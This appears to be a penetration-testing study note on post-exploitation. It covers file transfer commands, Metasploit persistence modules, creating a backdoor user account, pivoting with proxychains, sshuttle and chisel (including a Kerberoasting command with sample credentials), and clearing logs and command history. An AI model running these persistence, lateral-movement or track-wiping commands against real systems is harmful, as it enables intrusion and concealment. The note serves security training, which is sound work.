# 5. Post Exploitation ## File transfers ```bash # HTTP via Python python3 -m http.server 80 # Windows - Certutil certutil.exe -urlcache -f # Linux wget ... ``` *** ## Maintain access ➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** for extended periods, even after reboots or security updates. This is a crucial phase in **post-exploitation**, allowing testers to simulate real-world attacker **persistence** and assess an organization's ability to detect and respond to such threats. **Metasploit persistence methods** 1. **Persistence scripts:** * `run persistence -h` → Displays available persistence options. * `exploit/windows/local/persistence` → Creates a **backdoor** using Metasploit. * `exploit/windows/local/registry_persistence` → Modifies **Windows Registry** for persistence. 2. **Scheduled Tasks:** * `run scheduleme` → Creates a **scheduled task** to execute payloads periodically. * `run schtaskabuse` → **Abuses schtasks** to maintain system access. 3. **User Account Manipulation:** * `net user hacker password123 /add` → Creates a **new user account** for persistent access. These techniques help attackers maintain **long-term access** even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms. *** ## Pivoting ➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network. ### proxychains ➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies ```bash cat /etc/proxychains4.conf # check socks4 port ssh -f -N -D 9050 -i pivot @ # e.g. pivoting proxychains nmap -p proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip -request proxychains xfreerdp /u:administrator /p:'p@ssword' /v: proxychains firefox ``` ### sshuttle ➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling ```bash sshuttle -r @ --ssh-cmd "ssh -i pivot" # keep this terminal open # run commands in other terminals ``` ### chisel ➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH *** ## Cleaning up ➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no traces** of testing activities remain on the target system or network. The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption. * **Remove files** – Delete scripts, executables, and added files * **Eliminate persistence** – Remove malware, backdoors, tasks, and added user accounts * **Restore settings** – Revert settings, security configs, firewall rules, and permissions. * **Clear tracks** – Wipe command history and logs. 📌 From a hacker perspective, you need to "**make it look like you were never there**". ***